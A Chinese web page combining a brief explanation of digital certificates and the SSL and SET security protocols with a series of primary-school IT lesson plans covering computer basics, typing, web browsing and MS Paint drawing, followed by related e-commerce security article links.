数字证书用电子手段来证实一个用户的身份和对网络资源的访问权限,由权威机构CA采用数字签名技术颁发给用户的。是在数字领域中证实用户的一种凭证。主要包括证书发行者对证书的签名,证书拥有者的名称,证书拥有者的公共钥匙,颁发数字证书单位的数字签名。认证中心,承担网上安全电子交易认证服务、签发数字证书并能确认用户身份的服务机构。
四、信息安全协议
1、SSL安全协议,安全套接层协议,是通过使用公开密钥体制和数字证书技术保护信息传输的机密性和完整性的协议。在互联网基础上能够对信用卡和个人信息提供较强保护的一种保证机密性的安全协议。
2、SET安全协议,采用对称密钥和非对称密钥体制,保证支付信息的机密、支付过程的完整、商户及持卡人的合法身份,以解决用户、商家和银行之间通过信用卡安全支付问题的协议。SET协议已成为目前公认的信用卡网上交易的国际标准,主要解决信用卡电子付款的安全保障。
第一课 身边信息多又多
教学目标: 知识与技能:
1、检索和整理自己头脑中已有的“信息”,与同学交流,从别人那里获得新信息。
2、按“流程”归纳一下“一日学习与生活”,感知信息的影响;过程与方法:通过事例明白信息在生活、学习中的作用;
情感态度价值观:培养对信息的兴趣,增强求知欲。
教学重难点:明白信息的存在,感知信息的作用,领悟信息的含义。课型:新授 课时:1课时 教学过程:
一、检索自己头脑中已有的信息:
观看书上的图片,说说你所接受到的信息有哪些。
在学习中接受的信息;在看电视时接受的信息;在家里家长介绍的信息;放学经过的商业街充满信息;马路上的红绿灯信息;天气信息等等
二、信息的影响:
1、以小组为单位,讨论完成P1,2的图示,整理一下身边的信息。
2、班内交流、举例说明几条信息,并说明处理方法。
三、信息的重要作用:
1、生想象和猜测图中的孩子获得了什么具体信息。
2、师归纳总结:信息的定义和种类。(图形,图符,符号等等)
四、信息的感知:
1、生看图P3说出自己得到的信息。
2、师小结,表扬,鼓励多种见解。
五、试一试:师生交流,完成p4。
六、课后作业:
1、从10条不同的渠道收集10条信息,然后用画图地方法将它们分类。
2、看看自己能不能为身边的人(家人,朋友)传播几条信息。
第二课 看看电脑是什么
教学目标: 知识与技能:
1、了解计算机的组成和各部分作用。
2、掌握正确的开关机顺序。
过程与方法:通过实物与讲解了解计算机的硬件知识; 情感态度价值观:培养对信息技术的兴趣,发展探究精神。教学重难点:
重点:计算机的组成、各部分的作用及开机、关机的正确操作。难点:正确理解各部分的作用。课时:1课时 教学过程:
一、创设情境、激发兴趣:
同学们都见过电脑,可是你了解电脑的每一个部分吗?这不,小博士和爸爸一大早就来到电脑城,买了一台电脑回家。电脑来到新家,兴奋得晚上都睡不着觉了。他们举行了晚会,还邀请小博士一起参加,其实呀,是想考考小博士对它们了解多少。大家想不想去看一看?这节课,我们就和小博士一道去参加电脑的晚会,了解信息技术的好帮手——电脑吧!
二、分组活动,合作学习:
1、你能叫出电脑这些部分的名称吗?
2、小组内进行交流:比一比,哪些小组完成得又快又好。
3、小游戏:“盲人摸象”。
三、自主探究,展示交流:
1、电脑里得各部分谁得本领最大?请你们也来参加它们的讨论,看看你能不能说服大家。在教师的引导下学生自由分组选择自己要扮演的角色:主机、显示器、键盘、鼠标、裁判。
2、分组活动:学习自己代言的那部分的作用
3、展示交流:小小辩论赛。
4、小结:将结论写下来,完成P21填空
四、操作实践,巩固练习:
1、情感共鸣:了解了电脑,知道它是我们的好朋友,那么在使用它时就应该注意不要伤害了它,要按照正确的操作方法进行操作。
2.完成填空 3.完成开关机操作
第三课 电脑能干什么
教学目标: 1.通过学习,知道电脑有哪些功能,了解电脑在现代生活中的广泛应用。2.在学习的过程中,培养同学们观察生活的习惯。3.激发同学们自觉爱科学、学科学、用科学的兴趣。教学重、难点:电脑的各种功能 教学时间:一课时 教学过程:
一、导入:
师:上节课,我们了解了信息技术的概念,同时也知道了计算机与网络技术是信息技术里面很重要的一部分。今天我们就来深入了解一下计算机到底有哪些功能。
二、电脑功能的介绍:
师:计算机又称为电脑。它的本领可大了。现在我们来分组讨论,大家来想一想在生活中,你们所了解的电脑都有哪些功能。
学生以四人为单位,分组讨论。学生汇报讨论的结果,老师以板书形式呈现,并加以补充和介绍: 功能1:存放资料
电脑存储设备可以存放大量的文字、图片、音乐、视频等资料。其实电脑的存储容量是很大的。一张普通光盘可以存放3亿多个汉字。但视频文件相对于文字来,会占用更多的空间。
功能2:画漂亮的图
用电脑画图可以随意地改变颜色,改变图形,我们通过电脑可以很方便、快速地画完美的圆形,能够用复制的方式,快速地画出草地等。
功能3:听音乐、看电影或动画。
功能4:上网校、看新闻、收发电子,邮件等。功能5:制作电脑课件。功能6:电脑翻译。功能7:制作数字电影。
三、练习:完成课本第15页的“说一说”
第四课 桌面图标点开看
教学目标与要求: 知识与技能:1、2、3、4、认识桌面上的图标和作用 了解图标的形成 认识窗口和对话框 会调整窗口
过程与方法:
通过讲解和操作,让学生经历操作的过程,了解窗口、对话框 情感态度与价值观
培养学生自己动手操作的能力,和对计算机技术的热爱 教学重点和难点:
认识窗口、对话框的各种按钮和作用 教学过程
复习导入
学生们打开电脑后,就可以看到windows桌面,桌面上一些图案我们叫什么? 学生回答:图标 桌面底部的长条叫什么?
学生回答:任务栏 那么图标是怎么形成的呢?
学生回答:………… 那么我们怎么来排列图标呢?
教师演示两种方式来排列图标:一种自己来拖动图标来排列图标
另一种是点击“右键”来自动排列图标 动手操作,技能提升
1、给学生自己动手操作的机会,来排列图标,锻炼自己操作的能力
2、认识窗口,试着动手操作各种按钮的作用 任务驱使,自主学习1、2、3、反馈总结
说说这节课大家都学习到了什么?有什么收获?
完成桌面图标按要求排列 调整窗口大小并且居中 点出对话框
第五课 我和键盘交朋友
教学目标: 知识与技能:
1、认识键盘的基本结构
2、熟悉指法,按正确的姿势和键盘指法完成练习。过程与方法:通过实物、讲解与操作学习键盘的操作;
情感态度价值观:培养对信息技术及工具的兴趣,发展探究精神。教学重难点:探索并掌握键盘的操作。课型:新授 课时:1课时 教学过程:
一、情景激发、定向引导:
1、今天,老师为大家带来了一位新朋友,它是谁呢?请听听它的自我介绍吧!
2、引导学生观察、移动桌面上键盘置疑,提出问题。
二、引导发现、初步感知:
1、键盘的结构是怎样的呢?
2、学生当小老师示范,教师规范动作养成良好的操作习惯。
3、引导学生掌握键盘的操作。
三、任务驱动、自主学习:
1、进行游戏“金山打字游戏”
2、反馈游戏收获
四、拓展思维,发展创新:引导学生熟悉键盘的操作
第六课 拼音打字好又快
教学目标: 知识与技能:
1、能熟悉拼音输入法,并熟悉上面四个控制按钮的作用。
2、能用拼音打字
过程与方法:通过拼音输入法打字,达到巩固拼音知识 情感态度价值观:培养对信息技术的兴趣。
教学重难点:能借助“帮助”或其他学习方法,自主探索拼音打字的操作方法
课型:新授 课时:1课时 教学过程:
一、情景激发、定向引导:
大家电脑上的字是怎么打出来的吗?今天我们来学习怎么打字?
二、自主探究、协作交流:
1、电脑操作演示怎么用拼音输入法打字。
2、学生自己动手来操作。
3、完成输入一首诗。
三、拓展思维、发展创造:怎么使刚刚自己打的诗的字体变大,修改颜色呢?
第七课 电脑上网看世界
教学目标: 知识与技能:
1、认识因特网,掌握用IE浏览器打开,浏览网页
2、正确使用IE浏览器的常用工具,应用IE浏览器收藏网页 过程与方法:通过讨论对话、实践操作学习; 情感态度价值观:培养对信息技术的兴趣。教学重点:正确使用IE浏览器快速、准确的查看网页 教学难点:IE浏览器常用工具的使用 课型:新授 课时:1课时 教学过程:
一、情景激发、定向引导:
1、相信大家都知道20xx年奥运会在中国北京举行,届时中国将会迎来世界各国观光的游客,为此学校将要招聘一批优秀的小导游为奥运出点力。你们想成为其中的一员吗?
2、我们如何利用网络浏览我们所需要的信息呢?
二、自主探究、协作交流:
1、认识浏览器
2、浏览网页,你能根据课本的提示信息浏览网页吗?
3、收藏网页
4、浏览网络信息
三、拓展思维、发展创造:浏览“cctv-少儿”网站,并将浏览的信息整理完成书上的表格。
第八课 网络信息我保存
教学目标: 知识与技能:
1、学会将网页上的文字信息粘贴到文字处理软件中,并保存下来
2、学会将搜索到的图片保存到自己的文件夹中
3、学会保存网络信息,保存整个网页 过程与方法:主动探究,发展创新;
情感态度价值观:培养对信息技术的兴趣,增强信息处理意识。教学重难点:
1、学会保存网页上的文字和图片
2、根据资料的内容,用文件夹分类保存文字和图片资料 课型:新授 课时:1课时 教学过程:
一、激趣引入:
教师:我们可以把在网络中搜索到的文字、图片或音乐等保存到自己的计算机里,以便随时查看,合理的利用。我们找到了信息怎么才能把它们保存下来呢?今天我们就要来学习怎么保存网络信息。
二、查找信息并保存:
教师演示查找苏轼的关于中秋节的诗词,并且保存。保存文字步骤:
1、复制网页上的文字。
2、启动文字编辑工具,如记事本等。
3、粘贴文字,保存文件。
让学生操作,把苏轼的中秋节的诗词保存下来到自己的文件夹中。
三、搜索图片并保存: 教师演示怎样搜索图片。
1、单击“图片”
2、输入关键词“中秋节”。
3、单击“百度一下”。
4、单击需要保存的图片。教师演示怎样保存图片。
1、在图片上右击,选择“图片另存为”
2、单击,选择图片存放位置。
3、输入图片的文件名。
4、单击“保存”按钮,完成保存。
学生操作,保存两张关于中秋节的图片到自己的图片文件夹中。教师展示学生保存的图片。
四、版权法的教育:教师让学生阅读P26记一记,《中华人民共和国著作权法》规定。
五、巩固练习:让学生搜索与中秋节相关的文字和图片,分类保存到自己的文件夹中。
六、探索学习:同学们,网上除了又文字、图片资料外,还有好听的音乐、好看的视频等。你能试着查找并下载音乐或者视频吗?
学生自己探索学习。
七、教师总结:让学生说说本节课我们学习到什么?
第九课 当个电脑小画家——画图初识
教学目标:
1.熟悉画图窗口的基本组成,了解各部分的作用。2.探究画图工具箱中基本工具的使用方法。
3.根据自己的印象,给春、夏、秋、冬四季图画填充颜色。4.通过绘图学习,培养学生学生计算机的兴趣。教学重点:学生认识并学习使用画图工具 教学难点:画图工具的使用 教学准备:
1、春、夏、秋、冬四季给我们的印象。
2、电脑鼠标、键盘的使用方法。
3、本课时配套光盘 课型:新授 课时:1课时 教学过程:
一、复习导入:
1、本节课的学习任务
2、作品欣赏,激趣
二、打开画图窗口:
打开画图窗口就是启动“画图”软件
如果在WINDOWS桌面上把“图画”设定为快捷方式,在上双击画图快捷方式图标就可以直接打开“画图”窗口。
三、认识“画图”窗口:
用我们自己的话描述“画图”窗口各部分的作用(每填写一条可以得到一颗星)。
四、设置“画纸”属性:
动手绘画之前,一般先要设置“画纸”的颜色和大小。
方法1:在“画纸”的右下角及它的两条边上,都有蓝色的控制点。当鼠标指针移到这些点时,指针变为“双向箭头”,这时按下鼠标左键并拖动,就可以改变“画纸”的大小。当“画纸”大于窗口时,窗口内只能显示一部分画面,如果要看其他部分,可以利用滚动条移动“画纸”。
方法2:点击图像-----属性,然后输入宽度和高度
五、认识画图工具:
工具箱、样式区、前景色、背景色、调色板、滚动条、画图区及取消方法CTRL+Z或是橡皮工具
六、观察演示:学生观察电脑《春天》图画的演示,构思自己的图画内容。
七、用画图工具画图:
1.尝试用画图工具箱里的各种图形工具画图。
2.用画图工具箱里的填充工具,给春、夏、秋、冬四季图画填充颜色。3.学生练习,老师巡视个别指导。4.学生作业展示,师生点评。
5.你会画下列图画吗?分别运用了工具栏中哪些工具? 6.欣赏《春天》绘图过程,完成作业。
八、课堂小结:在学习过程中,你做到了以下几点吗?每做到一点就可以得到一颗星。第十课 当个电脑小画家——徒手绘画
教学目标:
1.探究画图工具箱中铅笔和刷子工具的使用方法。2.在画图中学习使用橡皮工具和放大镜工具。3.通过绘图学习,培养学生学生计算机的兴趣。教学重点:学生认识并学习使用“铅笔”和“刷子”工具 教学难点:“铅笔”和“刷子”工具的使用 教学准备:
1、电脑鼠标、键盘的使用方法。
2、本课时配套光盘 课型:新授 课时:1课时 教学过程:
一、复习导入
1、本节课的学习任务
2、作品欣赏,激趣
二、打开画图窗口:
打开画图窗口就是启动“画图”软件。
如果在WINDOWS桌面上把“图画”设定为快捷方式,在上双击画图快捷方式图标就可以直接打开“画图”窗口。
三、认识“铅笔”和“刷子”工具:
了解铅笔和刷子工具的作用以及如何设置它们的属性。(每填写一条可以得到一颗星)。
四、观察演示:学生观察教学支持网站上的动画演示
五、用“铅笔”和“刷子”工具画图:
1、画房子、草地和炊烟。
2、画树木和太阳。
3、画天上的白云和地上的小花。
4、给图画填充颜色。
5、学生练习,老师巡视个别指导。
6、学生作业展示,师生点评。
六、使用“橡皮”和“放大镜”工具对图画进行修改:
1、学习放大镜工具的使用。
2、使用橡皮工具擦除绘图中的不足之处。
七、保存作品:
1.完成图画后,单击“保存”命令进行保存。2.选择图画文件保存的位置。3.为图画取个名字。
4.记住图画名字和保存位置,单击“保存”按钮,完成保存。
八、课堂小结:互动评。
第十一课 当个电脑小画家——线条妙用
教学目标:
1.探究画图工具箱中“直线”和“曲线”工具的使用方法。2.通过绘图学习,培养学生学生计算机的兴趣。教学重点:学生认识并学习使用“直线”和“曲线”工具 教学难点:“曲线”工具的使用 教学准备:本课时配套光盘 课型:新授 课时:1课时 教学过程:
一、复习导入
1、本节课的学习任务
2、作品欣赏,激趣
二、打开画图窗口:
三、认识“直线”和“曲线”工具:
1、了解“直线”工具的作用以及如何设置它们的属性。改变线条的粗细
按住shift键,可画出有规律的线条
2、了解“曲线”工具的作用以及如何设置它们的属性。直线拖曳法 三点连击法
四、观察演示:学生观察教学支持网站上的动画演示
五、用“直线”和“曲线”工具画图:
1、不要画得太分散。
2、不要画得偏向一边。
3、不要画得太满。
4、不要画得太小。
5、学生练习,老师巡视个别指导。
6、学生作业展示,师生点评。
六、课堂小结:互动评。
第十二课 当个电脑小画家——工具造型
教学目标:
1.学习“椭圆”、“矩形”和“多边形”工具的使用方法。2.通过绘图学习,培养学生学生计算机的兴趣。
教学重点:学生认识并学习使用“椭圆”、“矩形”和“多边形”工具 教学难点:“椭圆”、“矩形”和“多边形”工具的使用 教学准备:本课时配套光盘 课型:新授 课时:1课时 教学过程:
一、复习导入:
1、本节课的学习任务
2、作品欣赏,激趣
二、打开画图窗口:
三、认识“椭圆”、“矩形”和“多边形”工具:
1、了解“椭圆”工具的作用以及如何设置它们的属性。
2、了解“矩形”工具的作用以及如何设置它们的属性。
3、了解“多边形”工具的作用以及如何设置它们的属性。运用图形工具画图时,按住shift键,可画出规则的图形。看起来像哪种形状,就用相应的工具画出它们。
四、观察:学生观察教学支持网站上的利用这三种工具画出的漂亮图形。
五、用“椭圆”、“矩形”和“多边形”工具画图:
1、看光盘上的演示动画。
2、学生练习,老师巡视个别指导。
3、学生作业展示,师生点评
六、课堂小结:互动评。
第十三课 当个电脑小画家——图形复制
教学目标:
1.学习图形的选取和复制。
2.通过绘图学习,培养学生学生计算机的兴趣。教学重点:学生认识并学习使用图形复制和粘贴 教学难点:图形复制和粘贴 教学准备:本课时配套光盘 课型:新授 课时:1课时 教学过程:
一、复习导入:
1、本节课的学习任务
2、作品欣赏,激趣
二、打开画图窗口:
三、选取图形:
方法一:单击“选取”工具,在画图区手动鼠标,拖出一个闭合的虚线矩形,框住所要选取的图形。
方法二:单击“任意裁剪”工具,在画图区拖动鼠标,画出一条任意形状的封闭曲线,包围所要选取的图形。
四、复制和粘贴图形:
1、用“任意裁剪”工具或“选取”工具选取苹果图形,然后单击“编辑”菜单的“复制”命令。
2、单击“编辑”菜单的“粘贴”命令,画面的左上角就粘贴了一个苹果图形,拖动它移到合适的位置。
3、重复“粘贴”操作,就可以复制满树的苹果。
四、观察:学生观察教学支持网站上演示动画。
五、对照葡萄图,使用“复制”和“粘贴”的方法,画图:
1、学生练习,老师巡视个别指导。
2、学生作业展示,师生点评。
六、课堂小结:互动评。
综合实践——我给童谣配幅画
教学目标:
1.学习图形的选取和复制。
2.通过绘图学习,培养学生学生计算机的兴趣。教学重点:学生认识并学习使用图形复制和粘贴 教学难点:图形复制和粘贴 教学准备:本课时配套光盘 课型:实践课 课时:1课时 教学过程:
一、复习导入:
1、本节课的学习任务
2、作品欣赏,激趣
二、打开画图窗口:
三、选择童谣:选择喜爱的童谣,理解童谣的意思,是进行童谣图画创作的基础。
四、构图:勾画出各种图形的轮廓,确定它们在画中的位置。
五、描线:用画图工具画出礁石、珊瑚、水草和鱼的细节部分。
六、填色:
七、配童谣:
【电子商务网络信息安全】推荐阅读:
电子商务信息安全12-07
网络环境下,电子商务安全策略的研究07-23
电子商务的信息安全教学案例10-11
网络营销与电子商务07-13
网络营销之电子商务营销11-03
电子商务网络优化实习报告11-24
电子商务与网络经济学12-30
电子商务(网络销售)实习报告09-11
电子商务与网络营销学习心得12-28
电子商务与信息化报告07-05